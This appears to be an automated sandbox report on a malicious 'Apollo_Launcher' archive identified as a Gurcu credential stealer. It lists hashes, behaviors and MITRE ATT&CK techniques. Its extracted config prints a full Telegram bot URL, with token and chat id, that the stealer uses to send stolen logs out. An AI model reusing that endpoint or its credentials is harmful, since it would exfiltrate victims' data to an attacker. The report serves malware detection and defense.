General
-
Target
Apollo_Launcher.zip
-
Size
1.9MB
-
Sample
241206-w7y6kawrhn
-
MD5
cf73d6762749d11543a4e460cff5d397
-
SHA1
660b32ae6fb5d892cd876362d5532050843738c0
-
SHA256
4db6dc9037c5d39bead0329595ff1d7b570a030f77b5e5d7d09e904b78ba4115
-
SHA512
f0cb91d5ff524d4d68e1ed83cb8e7445170a8db0979d202eca28f2e50a9a82478b1f1f433e0605865f4ec74d884e9470b98ef4df339fe788924a809e630516a8
-
SSDEEP
49152:3KR32o1dQ8aBzCUaiGeDffKm1Ne0bWXtcgvwgdvBeQTUDKgi0lbh:Y3vaLGet1Ne0gX4WvBXUDni0ph
Static task
static1
Behavioral task
behavioral1
Sample
Apollo_Launcher/Apollo.jar
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Apollo_Launcher/Apollo.jar
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Apollo_Launcher/start.bat
Resource
win7-20240708-en
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4549607810&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Targets
-
-
Target
Apollo_Launcher/Apollo.jar
-
Size
2.0MB
-
MD5
15eb6fe01e6f4de3898fb3faae895d99
-
SHA1
938d9712ba8b467f152b8ccbeb6c8808b923fc46
-
SHA256
8bc91eaf5b775214114e924cae0ab9d121407f9e2f596dbe23392f50e1cdd504
-
SHA512
7a0adf4c59ec37249ae6890abc15c7191a6acec5271321c65ab2eb3d1b98508a744e7e5efd041bbaafee76bc06f55e9398a3c9f87d5c3c0d1d06e6d98ebe2092
-
SSDEEP
49152:clTene/sJMqUf0YS4N8+7euBwlLy6t2TSliSjek/:cline/pq1YF6d+ZTnSB/
-
Gurcu family
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
-
-
Target
Apollo_Launcher/start.bat
-
Size
839B
-
MD5
977bfc518ac71c9a003d5429407c589d
-
SHA1
48c382feb7e7aa33c48d4f2198a9c9a69f8782c0
-
SHA256
98663a87b891ceb87520dfd8f997c4e3d531007ed9d9cd2e5e55c120f664cc85
-
SHA512
05c0bc7ffab4b9026cf39dfa5d33a07ba3db90cdf858193d63b0aa63c3efd869c117b5086fb664b6cdaefd8f16cfe98e9972ab743354a120594bdc50f2bf3db1
-
Gurcu family
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory
-
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1